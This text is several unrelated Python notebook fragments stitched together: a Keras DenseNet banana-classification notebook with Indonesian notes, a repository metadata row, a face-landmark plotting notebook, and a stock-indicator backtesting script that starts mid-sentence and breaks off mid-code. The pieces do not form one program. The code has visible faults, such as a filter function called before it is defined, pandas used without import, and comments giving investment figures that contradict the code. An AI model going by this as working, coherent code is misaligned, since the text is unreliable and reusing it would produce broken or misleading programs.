# pooling: optional pooling mode for feature extraction when include_top is False. None means that the output of the model will be the 4D tensor output of the last convolutional layer. avg means that global average pooling will be applied to the output of the last convolutional layer, and thus the output of the model will be a 2D tensor. max means that global max pooling will be applied.
# classes: optional number of classes to classify images into, only to be specified if include_top is True, and if no weights argument is specified.
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a" papermill={"duration": 6.230086, "end_time": "2020-11-21T22:02:17.580732", "exception": false, "start_time": "2020-11-21T22:02:11.350646", "status": "completed"}
from keras.applications import densenet
from keras.preprocessing import image
from keras.applications.densenet import preprocess_input, decode_predictions
import numpy as np
from keras.layers import Dense, GlobalAveragePooling2D
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Model
from keras.optimizers import Adam
import os
# + papermill={"duration": 0.027135, "end_time": "2020-11-21T22:02:17.621951", "exception": false, "start_time": "2020-11-21T22:02:17.594816", "status": "completed"}
Mengumpulkan Gambar Pisang
Dataset khusus gambar pisang tanduk maupun pisang kepok agak sulit untuk ditemukan. Untungnya kita hanya memerlukan sedikit data untuk transfer learning, sehingga untuk mencari di Google Image lima puluh gambar pisang rasanya masih manusiawi. Untuk sedikit meringankan pekerjaan (kita harus memverifikasi hasil download secara manual), kita gunakan google-image-download.
Simpan gambar-gambar pisang sehingga struktur folder kita menjadi seperti berikut (andaikan kita punya 50 gambar pisang kepok dan 50 pisang tanduk.
# + papermill={"duration": 0.132899, "end_time": "2020-11-21T22:02:17.769102", "exception": false, "start_time": "2020-11-21T22:02:17.636203", "status": "completed"}
train_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)
train_generator = train_datagen.flow_from_directory('../input/pisangtrain/pisangtrain',
target_size=(224,224),
color_mode='rgb',
batch_size=32,
class_mode='categorical',
shuffle=True)
category_dict = train_generator.class_indices
print(category_dict)
# + papermill={"duration": 5.269402, "end_time": "2020-11-21T22:02:23.053909", "exception": false, "start_time": "2020-11-21T22:02:17.784507", "status": "completed"}
number_of_classes = len(category_dict)
base_model = densenet.DenseNet121(weights='../input/petfinder-densenet/densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5',include_top=False)
#base_model =densenet.DenseNet121(weights=’imagenet',include_top=False)
x = base_model.output
x = GlobalAveragePooling2D()(x)
x = Dense(512, activation='relu')(x)
x = Dense(512, activation='relu')(x)
x = Dense(256, activation='relu')(x)
preds = Dense(number_of_classes, activation='softmax')(x)
model = Model(inputs=base_model.input, outputs=preds)
# Print the updated layer names.
# for i,layer in enumerate(model.layers): print(i,layer.name)
# Set the first n_freeze layers of the network to be non-trainable.
n_freeze = 300
for layer in model.layers[:n_freeze]:
layer.trainable=False
for layer in model.layers[n_freeze:]:
layer.trainable=True
# + papermill={"duration": 0.026252, "end_time": "2020-11-21T22:02:23.095787", "exception": false, "start_time": "2020-11-21T22:02:23.069535", "status": "completed"}
print(len(model.layers))
# + papermill={"duration": 0.185859, "end_time": "2020-11-21T22:02:23.297243", "exception": false, "start_time": "2020-11-21T22:02:23.111384", "status": "completed"}
model.summary()
# + papermill={"duration": 180.217779, "end_time": "2020-11-21T22:05:23.536115", "exception": false, "start_time": "2020-11-21T22:02:23.318336", "status": "completed"}
model.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['accuracy'])
step_size_train = train_generator.n//train_generator.batch_size
model.fit_generator(generator=train_generator,
steps_per_epoch=step_size_train,
epochs=10)
# + papermill={"duration": 4.477901, "end_time": "2020-11-21T22:05:28.062127", "exception": false, "start_time": "2020-11-21T22:05:23.584226", "status": "completed"}
# Without transfer learning.
#default_model = densenet.DenseNet121(weights='../input/petfinder-densenet/densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5')
default_model = densenet.DenseNet121(weights='../input/petfinder-densenet/densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5',include_top=False)
#densenet.DenseNet121(weights=’imagenet',include_top=True)
# + papermill={"duration": 11.764845, "end_time": "2020-11-21T22:05:39.875067", "exception": false, "start_time": "2020-11-21T22:05:28.110222", "status": "completed"}
test_path = '../input/pisangtest/pisangtest/'
#test_path = 'pisang-test/'
for directory in os.listdir(test_path):
# Load image.
img_path = test_path+directory
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
preds = model.predict(x)
default_preds = default_model.predict(x)
# Printing results.
# Default 1000 classes (without transfer learning).
#print(f"Without Transfer Learning Top-2 [{directory}]: \n{decode_predictions(default_preds, top=2)[0]}\n")
# Print transfer learning model top-1
confidence_array = preds[0]
index_max = np.argmax(confidence_array)
# Get KEY (category) by VALUE (index_max) in dictionary
# mydict = {'george':16,'amber':19}
# print(list(mydict.keys())[list(mydict.values()).index(16)]) # Example in one line.
category_names = category_dict.keys()
category_values = category_dict.values()
category_at_index = list(category_values).index(index_max)
category_max = list(category_names)[category_at_index]
print(f"\nWith Transfer Learning [{directory}]: \nTop-1 (confidence)\n{category_max} ({max(confidence_array)*100}%)")
# Print transfer learning model all classes
print("\nClass (confidence)")
for category in category_dict:
category_index = category_dict[category]
value = confidence_array[category_index] * 100
print(f"{category} ({value}%)")
print("\n============================\n")
# + [markdown] papermill={"duration": 0.057679, "end_time": "2020-11-21T22:05:39.991151", "exception": false, "start_time": "2020-11-21T22:05:39.933472", "status": "completed"}
# https://keras.io/api/applications/#resnet
# + papermill={"duration": 0.057179, "end_time": "2020-11-21T22:05:40.106980", "exception": false, "start_time": "2020-11-21T22:05:40.049801", "status": "completed"}
# + papermill={"duration": 4.568149, "end_time": "2020-11-21T22:05:44.733197", "exception": false, "start_time": "2020-11-21T22:05:40.165048", "status": "completed"}
from keras.applications.xception import Xception
from keras.preprocessing import image
from keras.applications.xception import preprocess_input, decode_predictions
import numpy as np
import PIL
from PIL import Image
import requests
from io import BytesIO
# load the model
model = Xception(weights='imagenet', include_top=True)
img = image.load_img('../input/pisangtest/pisangtest/ambon1.jpg')
# resize the image according to each model (see documentation of each model)
img = img.resize((299,299))
##############################################
# if you want to read the image from your PC
#############################################
# img_path = 'myimage.jpg'
# img = image.load_img(img_path, target_size=(299, 299))
#############################################
# convert to numpy array
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
features = model.predict(x)
# return the top 20 detected objects
label = decode_predictions(features, top=10)
label
| 11,351 |
/2D_Gaussian_distribution.ipynb
|
8783a085d047cc7d354ce31aee2d1942895c52ae
|
[] |
no_license
|
wjdgoruds2/Machine_Learning
|
https://github.com/wjdgoruds2/Machine_Learning
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 59,423 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Check landmarks
import pickle
import imageio
import azure
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
import azure
# %matplotlib inline
# +
def load_landmarks(stim='id-1274_AU26-100_AU9-33', api='google'):
stims = sorted(glob(f'../../../FEED_stimulus_frames/{stim}/*/texmap/frame*.png'))
# number of landmarks: 27 (azure), 34 (google)
n_lm = 27 if api == 'azure' else 34
xy = np.zeros((30, n_lm, 2)) # 30 frames
frames = [str(i).zfill(2) for i in range(1, 31)]
for i, frame in enumerate(frames):
info = stims[i].replace('.png', f'_api-{api}_annotations.pkl')
with open(info, 'rb') as f_in:
info = pickle.load(f_in)
if api == 'azure':
info = info[0].face_landmarks
ii = 0
for attr in dir(info):
this_attr = getattr(info, attr)
if isinstance(this_attr, azure.cognitiveservices.vision.face.models._models_py3.Coordinate):
xy[i, ii, 0] = this_attr.x
xy[i, ii, 1] = this_attr.y
ii += 1
elif api == 'google':
info = info.face_annotations[0]
for ii in range(len(info.landmarks)):
xy[i, ii, 0] = info.landmarks[ii].position.x
xy[i, ii, 1] = info.landmarks[ii].position.y
else:
raise ValueError("Choose api from 'google' and 'azure'.")
return stims, xy
stims, xy = load_landmarks(api='azure')
xy
# -
def plot_face(imgs, landmarks, frame_nr=0):
img = imageio.imread(imgs[frame_nr])
plt.figure(figsize=(6, 8))
plt.imshow(img)
lm = landmarks[frame_nr, :, :]
for i in range(lm.shape[0]):
x, y = lm[i, :]
plt.plot([x, x], [y, y], marker='o')
plt.show();
# +
import ipywidgets
from ipywidgets import interact, fixed
slider = ipywidgets.IntSlider(min=0, max=29, step=1, value=0)
interact(plot_face, frame_nr=slider, imgs=fixed(stims), landmarks=fixed(xy));
# +
from scipy.ndimage import gaussian_filter
xy_std = (xy - xy.mean(axis=0)) / xy.std(axis=0)
xy_filt = butter_bandpass_filter(data=xy_std[:, 0, :], lowcut=0.01, highcut=7, fs=30/1.25, order=5)
plt.plot(xy_filt)
# +
from scipy.signal import butter, lfilter
def butter_bandpass(lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = butter(order, [low, high], btype='band')
return b, a
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5):
b, a = butter_bandpass(lowcut, highcut, fs, order=order)
y = lfilter(b, a, data, axis=0)
return y
# +
from scipy.ndimage import gaussian_filter1d
# gaussian_filter1d?
s based on Symbol and Date
daily_data = temp_df.sort_values(by=['Symbol', 'Date'], ignore_index=True)
# reset the index
daily_data.reset_index(drop=True, inplace=True)
# observe the rows where the symbols change - to ensure sorting has worked correctly
daily_data.head(2710)
# to calculate the simple moving average - 5, 10 , 50, 100, 200 days
daily_data['SMA-5'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=5).mean())
daily_data['SMA-10'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=10).mean())
daily_data['SMA-50'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=50).mean())
daily_data['SMA-100'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=100).mean())
daily_data['SMA-200'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=200).mean())
# #### WHILE TA-LIB WAS USED, IT ENDED UP CONSUMING A LOT OF MEMORY STORAGE AND HENCE DID NOT RUN IN THE FINAL VERSION BUT THE CODE TO USE TA-LIB AND GET KPIs IS AS BELOW
# import talib so that we can check if we get KPIs
#pip install TA_Lib-0.4.19-cp37-cp37m-win_amd64.whl # installed manually on anaconda prompt after downloading whl file into the python folder
import talib
# +
# calculate SMA using TA LIB
## SMA-5
df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 5))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-5'] = dataframe_SMA_corrected.values
## SMA-10
#df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 10))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-10'] = dataframe_SMA_corrected.values
daily_data.head(2670)
## SMA-50
#df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 50))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-50'] = dataframe_SMA_corrected.values
daily_data.head(2670)
## SMA-100
#df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 100))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-100'] = dataframe_SMA_corrected.values
daily_data.head(2670)
## SMA-200
#df1_grouped = daily_data.groupby('Symbol')
SMA = [0]
for group_keys, df_group in df1_grouped:
SMA.append(talib.SMA(df_group['Close'], timeperiod = 200))
dataframe_SMA = pd.concat([pd.Series(x) for x in SMA], axis=0)
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_SMA_corrected = dataframe_SMA[1:]
# add the SMA value to the existing daily_data dataframe
daily_data['talib-SMA-200'] = dataframe_SMA_corrected.values
daily_data.head(2670)
# -
# #### END OF USAGE OF TA-LIB
# to calculate the exponential moving average - 5, 10 , 50, 100, 200 days
daily_data['EMA-5'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=5).mean())
daily_data['EMA-10'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=10).mean())
daily_data['EMA-50'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=50).mean())
daily_data['EMA-100'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=100).mean())
daily_data['EMA-200'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=200).mean())
# calculcate RSI - Relative strength index
change = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.diff())
gain = change.mask(change < 0, 0)
loss = change.mask (change > 0, 0)
average_gain= gain.rolling(window = 14).mean().shift()
average_loss= loss.rolling(window = 14).mean().shift()
relativestrength = abs(average_gain / average_loss)
rsi = 100 - (100/(1+relativestrength))
daily_data['rsi'] = rsi.shift(-1) # move up since the current column is already on next row due to rolling function
# calculate MACD
# MACD = 12-day EMA - 26-day EMA
daily_data['ema12'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=12).mean())
daily_data['ema26'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=26).mean())
daily_data['macd'] = daily_data['ema12'] - daily_data['ema26']
## for cross over - calculate macd9
daily_data['macd9'] = daily_data.groupby('Symbol')['macd'].transform(lambda x:x.ewm(span=9).mean())
# calculate bollinger band
daily_data['SMA-20'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=20).mean())
daily_data['stddev-20'] = daily_data.groupby('Symbol')['Close'].transform(lambda x:x.rolling(window=20).std())
daily_data['Bollinger-UpperBand'] = daily_data['SMA-20'] + 2*daily_data['stddev-20']
daily_data['Bollinger-LowerBand'] = daily_data['SMA-20'] - 2*daily_data['stddev-20']
# Calculate the OBV - based on price change, denote whether the volume needs to be added or subtracted in a new column - store it as list in OBV
df1_grouped = daily_data.groupby('Symbol')
OBV = [0]
for group_keys, df_group in df1_grouped:
i = 0
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if i == 0 :
OBV.append(df_group.loc[row_index, 'Volume'])
else :
if df_group.loc[row_index, 'Close'] > df_group.loc[row_index - 1, 'Close'] :
OBV.append(df_group.loc[row_index, 'Volume'])
if df_group.loc[row_index, 'Close'] == df_group.loc[row_index - 1, 'Close'] :
OBV.append(0)
if df_group.loc[row_index, 'Close'] < df_group.loc[row_index - 1, 'Close'] :
OBV.append(-df_group.loc[row_index, 'Volume'])
i = i + 1
# convert the series to dataframe with column as OBV
dataframe_OBV = pd.DataFrame(OBV,columns=['OBV'])
dataframe_OBV
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_OBV_corrected = dataframe_OBV[1:]
dataframe_OBV_corrected.tail()
# add the non-cumulative OBV value to the existing daily_data dataframe
daily_data['OBV Non-Cum'] = dataframe_OBV_corrected['OBV'].values
dataframe_OBV_corrected
daily_data.head(2670)
# do the cumulative sum based on the grouping iof each symbol to get the OBV for each Symbol
daily_data['OBV'] = daily_data.groupby('Symbol')['OBV Non-Cum'].cumsum()
daily_data.head(2710)
daily_data.isnull().sum()
# determine Bearish or Bullish market and the trade strategy based on macd and macd9
# if macd > macd9, "bullish" and "buy"
# if macd < macd9, "bearish" and "sell"
daily_data['TradingStrategymacd'] = np.where(daily_data['macd'] > daily_data['macd9'], "Buy", "Sell")
# determine the trading strategy for Bollinger
# Buy - first trade confirmation we need is for the price to break and close above the middle Bollinger band
# Sell - Close price drops from a Buy region of y/day to below the middle Bollinger band
daily_data['TradingStrategyBollinger'] = np.where(daily_data['Close'] >= daily_data['SMA-20'], "Buy", "Sell")
# determine the trading strategy for RSI
# RSI reading above the 50 level is considered as a positive momentum
# RSI reading below the 50 level is considered negative momentum
daily_data['TradingStrategyRSI'] = np.where(daily_data['rsi'] > 50, "positive", "negative")
# determine the trading strategy for OBV
# Buy at the market once you see volume confirming the price
daily_data['TradingStrategyOBV'] = np.where((daily_data['OBV'] > daily_data['OBV'].shift(1)) & (daily_data['OBV'] > 0), "Buy", "Sell")
# +
# HIDE THE PROTECTIVE STOP LOSS BELOW THE BOLLINGER BAND
# The logical place to hide your protective stop loss is below the lower Bollinger band.
# A break below the lower BB will invalidate our trade idea, and we want to minimize our losses.
# STRATEGY FOR EXIT FROM THE MARKET (MAKE A SELL DECISION)
# A break below the lower Bollinger Band is a good signal for a possible reversal, so cash out profits
daily_data['STOP'] = np.where((daily_data['Close'] < daily_data['Bollinger-LowerBand']), "STOP", "WAIT")
# +
# COMBINED STRATEGY TO ENTER THE MARKET (MAKE A BUY DECISION)
# Step #1: Price needs to Break and Close above the middle Bollinger Band
# Step #2: Wait for the RSI indicator to trade above the 50 level if it doesn’t already
# Step #3: Wait for the OBV indicator to rise. Buy at the market once you see volume confirming the price
# HIDE THE PROTECTIVE STOP LOSS BELOW THE BOLLINGER BAND
# The logical place to hide your protective stop loss is below the lower Bollinger band.
# A break below the lower BB will invalidate our trade idea, and we want to minimize our losses.
# STRATEGY FOR EXIT FROM THE MARKET (MAKE A SELL DECISION)
# A break below the lower Bollinger Band is a good signal for a possible reversal, so we want to cash out our profits
df1_grouped = daily_data.groupby('Symbol')
COMBINED = [0]
for group_keys, df_group in df1_grouped:
i = 0
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if i == 0 :
COMBINED.append("WAIT")
else:
if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_group.loc[row_index, 'TradingStrategyRSI'] == "positive":
if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
COMBINED.append("ENTER")
else:
COMBINED.append("SELL")
else:
COMBINED.append("SELL")
else:
COMBINED.append("WAIT")
i = i + 1
# -
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data['TradingStrategyCombined'] = dataframe_COMBINED_corrected['COMBINED'].values
# # STOCK - BACK TESTING UNTIL 28-AUG-2020 (10 YEARS)
## FOR BACK-TESTING FOR THE PERIOD FROM START UNTIL 31-AUG-2020
## SELECT THE DAILY_DATA TO REFLECT JUST THIS DATA AND NOT THE DATA FROM 01-SEP-2020
mask = (daily_data['Date'] <= "2020-08-28")
daily_data_back_test = daily_data[mask]
daily_data_back_test.head(2648)
# +
# BACK-TESTING FOR 10 YEARS - DAILY DATA - ACROSS ALL STOCKS
# MACD - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs over 100 stocks
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategymacd'] == "Sell":
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append(row['Symbol'])
Back_Test_10yrs.append("Sell")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategymacd'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append(row['Symbol'])
Back_Test_10yrs.append("Buy")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# -
def divide_chunks(list, n):
# looping till length l
for i in range(0, len(list), n):
yield list[i:i + n]
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
# move the list to dataframe
Buy_Sell_dataframe = []
Buy_Sell_dataframe = pd.DataFrame(Buy_Sell_list)
Buy_Sell_dataframe.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe ['Value'] = Buy_Sell_dataframe ['Price'] * Buy_Sell_dataframe ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe[Buy_Sell_dataframe.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
Buy_Sell_dataframe
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe.shape[0]
for index_row, row in Buy_Sell_dataframe.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe, add_rows_df])
# -
Buy_Sell_Consolidated = []
Buy_Sell_Consolidated = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
Buy_Sell_Consolidated.columns = ['Symbol', 'Txn', 'Cum Value']
# Sumarize in a dataframe
Buy_Sell_Summary = pd.DataFrame(Buy_Sell_Consolidated.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# +
c = [['temp','temp','temp','temp',0,0]]
Consolidated_Report_df = pd.DataFrame(c, columns=['Stock/Index', 'KPI', 'Criteria', 'Transaction', 'Value', 'Number of Txns'])
s = [['temp','temp','temp',0,0,0,0]]
Summary_Report_df = pd.DataFrame(s, columns=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss', 'Investment', 'Number of Txns', 'ROI'])
c = [['temp','temp','temp','temp', 'temp',0,0]]
Consolidated_Report_df2 = pd.DataFrame(c, columns=['Stock/Index', 'KPI', 'Criteria', 'Week#', 'Transaction', 'Value', 'Number of Txns'])
s = [['temp','temp','temp',0,0,0,0]]
Summary_Report_df2 = pd.DataFrame(s, columns=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss', 'Investment', 'Number of Txns', 'ROI'])
# -
## SUMMARIZE FOR REPORTING for BACKTESTING
def Summarize_Report (stock_index, kpi, criteria, temp_data):
buy_value = 0
buy_count = 0
sell_value = 0
sell_count = 0
profit_loss = 0
list1 = []
list2 = []
for row_index, row in temp_data.iterrows():
if (row['Txn'] == "Buy") :
buy_value = buy_value + row['Value']
buy_count = buy_count + 1
else:
sell_value = sell_value + row['Value']
sell_count = sell_count + 1
list1.append(stock_index)
list1.append(kpi)
list1.append(criteria)
list1.append("Buy")
list1.append(buy_value)
list1.append(buy_count)
list1.append(stock_index)
list1.append(kpi)
list1.append(criteria)
list1.append("Sell")
list1.append(sell_value)
list1.append(sell_count)
# calculate net profit (Sell - Buy)
profit_loss = sell_value - buy_value ### NET PROFIT OR LOSS FOR THE INVESTMENT MADE
list2.append(stock_index)
list2.append(kpi)
list2.append(criteria)
list2.append(profit_loss)
list2.append(investment)
list2.append(sell_count)
roi = (profit_loss/investment) * 100
list2.append(roi)
# add the rows to dataframe - CONSOLIDATED REPORT
n = 6
add_rows_split = []
add_rows_split = list(divide_chunks(list1, n))
temp1_df = pd.DataFrame(add_rows_split, columns=['Stock/Index', 'KPI', 'Criteria', 'Transaction', 'Value', 'Number of Txns'])
# Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp_df])
# add the rows to dataframe - SUMMARY REPORT
n = 7
add_rows_split = []
add_rows_split = list(divide_chunks(list2, n))
temp2_df = pd.DataFrame(add_rows_split, columns=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss', 'Investment', 'Number of Txns', 'ROI'])
# Summary_Report_df = pd.concat([Summary_Report_df, temp_df])
return temp1_df, temp2_df
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary['Value'].gt(0).sum().sum()
#Buy_Sell_Summary['Value'].sum()
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report("Stock", "macd", "(12-26)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(10)
Summary_Report_df.head(10)
# number of positives we got is 69 out of 100 and a significant gain.
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\MACD Buy_Sell12-26.csv')
# +
# REVISION BASED ON BACK-TESTING FOR MACD STRATEGY
# try with 5, 20 for macd instead of 12, 26 used. Then compare this outcome against macd9 and determine the buy/sell call
# Then do the back-testing to check if this strategy helps get a better nunber of positive from the current 52
# Calculate revised MACD
# Revised MACD = 5-day EMA - 20-day EMA
daily_data_back_test['ema5'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=5).mean())
daily_data_back_test['ema20'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=20).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema5'] - daily_data_back_test['ema20']
## for cross over - calculate macd9
daily_data_back_test['macd9'] = daily_data_back_test.groupby('Symbol')['macd_revised'].transform(lambda x:x.ewm(span=9).mean())
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
# +
# BACK-TESTING FOR 10 YEARS - DAILY DATA - ACROSS ALL STOCKS
# MACD REVISED - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# move to dataframe
Buy_Sell_dataframe_r = []
